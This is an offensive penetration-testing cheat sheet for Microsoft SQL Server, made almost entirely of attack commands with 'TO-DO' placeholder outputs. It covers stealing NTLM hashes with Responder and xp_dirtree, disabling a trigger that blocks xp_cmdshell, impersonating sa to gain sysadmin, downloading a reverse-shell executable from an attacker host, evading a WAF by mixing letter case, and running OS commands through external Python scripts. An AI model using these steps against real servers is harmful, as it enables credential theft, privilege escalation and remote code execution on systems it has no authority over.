Enumeration
# Import Module
. .\PowerUpSQL.ps1
Sample Output:
TO-DO
# Audit
Invoke-SQLAudit -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Verbose
Sample Output:
TO-DO
# Execute Query
Get-SQLQuery -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Query "<QUERY>" -Verbose
Sample Output:
TO-DO
Ref: PowerUpSQL.ps1
Abuse #1: Steal NTLM hash
# On our local Linux machine (start the listener before triggering the outbound connection below)
sudo responder -I tun0
Sample Output:
TO-DO
xp_dirtree '\\<LOCAL_IP>\any\thing';
Sample Output:
TO-DO
use master; exec xp_dirtree '\\<LOCAL_IP>\any\thing';
Sample Output:
TO-DO
load_file('\\<LOCAL_IP>\any\thing');
Sample Output:
TO-DO
Abuse #2: Run xp_cmdshell
# Check for any server-level trigger that blocks enabling xp_cmdshell
select name from sys.server_triggers;
Sample Output:
TO-DO
# Disable the blocking trigger, if one exists
disable trigger ALERT_xp_cmdshell on all server;
Sample Output:
TO-DO
# Enable xp_cmdshell
enable_xp_cmdshell;
Sample Output:
TO-DO
# RCE
xp_cmdshell whoami
Sample Output:
TO-DO
Abuse #3: Impersonate sa to run xp_cmdshell
# Add the current login to the sysadmin server role
execute as login = 'sa'; exec sp_addsrvrolemember '<USER>','sysadmin'
Sample Output:
TO-DO
# Check that the sysadmin membership took effect (1 = member)
SELECT is_srvrolemember('sysadmin');
Sample Output:
TO-DO
execute as login = 'sa'; exec sp_configure 'show advanced options', 1;
Sample Output:
TO-DO
execute as login = 'sa'; reconfigure;
Sample Output:
TO-DO
execute as login = 'sa'; exec sp_configure 'xp_cmdshell', 1;
Sample Output:
TO-DO
execute as login = 'sa'; reconfigure;
Sample Output:
TO-DO
execute as login = 'sa'; EXEC master..xp_cmdshell 'powershell.exe -ep bypass curl <LOCAL_IP>/rev.exe -o C:\ProgramData\rev.exe'
Sample Output:
TO-DO
Note: try xp_cmDshElL to bypass WAF
Abuse #4: Run External Script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
Sample Output:
TO-DO